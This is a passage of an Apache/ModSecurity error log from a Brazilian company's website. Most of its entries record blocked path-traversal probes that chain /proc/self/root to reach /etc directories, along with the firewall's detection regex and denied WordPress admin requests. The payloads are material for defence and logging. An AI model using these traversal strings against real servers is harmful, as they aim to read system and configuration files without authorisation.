"OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpt5eyqAr6etmhZHNqNXgAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:18:46.526080 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.241.31:60260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpt9tY0UrI5A3LftIxpPQAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:18:56.818981 2026] [mime_magic:error] [pid 19507:tid 140411616036608] (70014)End of file found: [client 216.73.216.191:33490] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:19:00.855608 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.241.31:37524] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuBOoXxyEfFpUF8f8-mAAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:19:01.922968 2026] [mime_magic:error] [pid 26799:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:33728] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:19:03.953874 2026] [mime_magic:error] [pid 11816:tid 140411574073088] (70014)End of file found: [client 216.73.216.191:33824] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:19:18.087638 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.241.31:51684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuFvu8EFLIOrSqIpvX_AAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:19:24.649597 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:36884] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuHCmAPhZkrhU8w4lAKAAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:19:58.436496 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:36900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuPta6ubjKNq_cu4ZoawAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:20:21.207607 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:45924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuVeyqAr6etmhZHNqN2AAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:20:22.776313 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.243.128:46304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuVimAPhZkrhU8w4lAOAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:20:24.126444 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:46306] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuWAkwaGbbGflqUZDieAAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:20:44.489494 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:46320] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpubNY0UrI5A3LftIxpjQAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:21:02.415728 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:53890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpufta6ubjKNq_cu4ZolgAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:21:06.659490 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:35136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuguoXxyEfFpUF8f8-3QAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:21:28.079312 2026] [:error] [pid 15051:tid 140411540502272] [client 74.7.243.128:35152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpumCmAPhZkrhU8w4lAagAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:21:43.772854 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:43476] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpup0zinOy1jxa1j4fk4AAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:21:58.222243 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.243.128:44460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abputuoXxyEfFpUF8f8-_gAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:22:11.959483 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:54402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuw_u8EFLIOrSqIpvYYwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:22:17.074010 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:33542] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpuyew_le52K8_3pV2zDQAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:22:30.683263 2026] [access_compat:error] [pid 11816:tid 140411599251200] [client 142.248.80.157:61862] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: https://www.google.com/
[Wed Mar 18 06:22:32.530382 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.228.61:55836] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpu2AkwaGbbGflqUZDi7QAAANA"]
[Wed Mar 18 06:22:33.896476 2026] [access_compat:error] [pid 11816:tid 140411683178240] [client 142.248.80.157:61862] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/admin-ajax.php, referer: https://bandeirantesbombas.com.br/wp-admin/plugin-editor.php
[Wed Mar 18 06:22:36.466907 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.244.43:42692] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpu3OoXxyEfFpUF8f8_HgAAAUo"]
[Wed Mar 18 06:22:51.148492 2026] [access_compat:error] [pid 15826:tid 140411632822016] [client 142.248.80.157:54616] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: https://www.google.com/
[Wed Mar 18 06:22:52.538395 2026] [access_compat:error] [pid 15826:tid 140411624429312] [client 142.248.80.157:54616] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/admin-ajax.php, referer: https://bandeirantesbombas.com.br/wp-admin/plugin-editor.php
[Wed Mar 18 06:22:59.008789 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.241.31:55610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpu80zinOy1jxa1j4flVAAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:23:09.054894 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:55284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpu_eoXxyEfFpUF8f8_OgAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:23:10.363802 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:36592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpu_ta6ubjKNq_cu4Zo8AAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
